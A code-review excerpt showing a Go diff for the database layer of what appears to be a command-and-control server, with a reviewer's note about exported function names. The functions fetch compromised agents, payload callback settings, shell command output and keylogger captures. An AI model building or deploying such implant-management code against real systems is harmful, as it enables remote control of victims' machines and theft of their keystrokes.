api/data.go

```diff
@@ -0,0 +1,598 @@
+			&agents.AgentIP,
+			&agents.Username,
+			&agents.Hostname,
+			&agents.Status,
+		)
+		agentAppend = append(agentAppend, agents)
+	}
+	return agentAppend
+}
+
+func GroupAgentsByIp(db *sql.DB) []types.AgentIP {
+	var agents types.AgentIP
+	FetchSQL := `
+	SELECT DISTINCT "Ip" FROM "Agents"
+	`
+	row, err := db.Query(FetchSQL)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer row.Close()
+	var agentAppend []types.AgentIP
+	for row.Next() {
+		row.Scan(
+			&agents.AgentIP,
+		)
+		agentAppend = append(agentAppend, agents)
+	}
+	return agentAppend
+}
+
+func Payloads(db *sql.DB) []types.Payload {
+	var payloads types.Payload
+	FetchSQL := `
+	SELECT 
+		"UUID", 
+		"Name",
+		"Description",
+		"ServerIP", 
+		"ServerPort", 
+		"CallbackFrequency", 
+		"CallbackJitter",
+		"Concat" 
+	FROM "Payloads"
+	WHERE "isDeleted"='0'
+	`
+	row, err := db.Query(FetchSQL)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer row.Close()
+	var payloadAppend []types.Payload
+	for row.Next() {
+		row.Scan(
+			&payloads.Uuid,
+			&payloads.Name,
+			&payloads.Description,
+			&payloads.ServerIP,
+			&payloads.ServerPort,
+			&payloads.CallbackFrequency,
+			&payloads.CallbackJitter,
+			&payloads.Concat,
+		)
+		payloadAppend = append(payloadAppend, payloads)
+	}
+	return payloadAppend
+}
+
+func Agent(db *sql.DB, uuid string) []types.Agent {
+	var info types.Agent
+	FetchSQL := `
+	SELECT 
+		"UUID", 
+		"CommandType", 
+		"Command", 
+		"CommandUUID", 
+		"Output"
+	FROM "Commands"
+	WHERE "UUID"= $1 AND "CommandType" = 'shell'
+	`
+	row, err := db.Query(FetchSQL, uuid)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer row.Close()
+	var infoAppend []types.Agent
+	for row.Next() {
+		row.Scan(
+			&info.Uuid,
+			&info.CommandType,
+			&info.Command,
+			&info.CommandUUID,
+			&info.Output,
+		)
+		infoAppend = append(infoAppend, info)
+	}
+	return infoAppend
+}
+
+func Keylog(db *sql.DB, uuid string) []types.KeyReceive {
+	var info types.KeyReceive
+	FetchSQL := `
+	SELECT 
+		"UUID", 
+		"Keys"
+	FROM "Keylog"
+	WHERE "UUID"= $1
+	`
+	row, err := db.Query(FetchSQL, uuid)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer row.Close()
+	var infoAppend []types.KeyReceive
+	for row.Next() {
+		row.Scan(
+			&info.Uuid,
+			&info.Keys,
+		)
+		info.Keys = helper.FormatKeyLogs(info.Keys)
+		infoAppend = append(infoAppend, info)
+	}
+	return infoAppend
+}
+
+func FetchOne(db *sql.DB, uuid string) []types.ConfigAgent {
+	var info types.ConfigAgent
+	FetchSQL := `
+	SELECT 
+		"UUID","CallBackToIP","CallBackFeq","CallBackJitter"
+	FROM "Agents" WHERE "UUID"=$1
+	`
+	row, err := db.Query(FetchSQL, uuid)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer row.Close()
+	var infoAppend []types.ConfigAgent
+	for row.Next() {
+		row.Scan(
+			&info.Uuid,
+			&info.CallbackTo,
+			&info.CallbackFrequency,
+			&info.CallbackJitter,
+		)
+	}
+	infoAppend = append(infoAppend, info)
+	logger.Logf(logger.Info, "%v\n", info)
+	return infoAppend
+}
+
+func createUserHandler(c *gin.Context) {
```

Comment:
Great! go functions needs to start with a Capital letter if you would like to use it in another file

Reply:
did not know this (I should probably read docs), but will adjust some stuff with this knowledge